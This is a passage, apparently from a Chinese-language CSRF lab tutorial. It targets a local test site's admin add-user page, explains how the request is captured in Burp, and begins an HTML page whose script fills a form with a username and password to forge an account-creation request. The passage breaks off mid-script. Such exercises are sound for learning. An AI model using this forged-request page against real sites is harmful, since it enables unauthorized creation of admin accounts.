正常打开页面:http://192.168.209.137/CSRF0/admin/users.php?do=add_user
这个网页使用request来接受信息的,所以可以接收GET也可以接收POST,通过burp抓提交的数据包得。
可以看到后面有一个do参数为add_confirm和我们之前的写表单的网址http://192.168.209.137/CSRF0/admin/users.php?do=add_user有相同的参数。那么说明提交的时候是在do=add_confirm里进行的,get方式直接拼接url即可。接下来构造POST请求。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF</title>
<script>
function abc(){
var f=document.getElementById("test");
f.getElementsByTagName("input")[0].value="user";
f.getElementsByTagName("input")[1].value="pass";
f.getElementsByTagName("input")[2].value="user";
f.getElementsByTagName("input")[3].val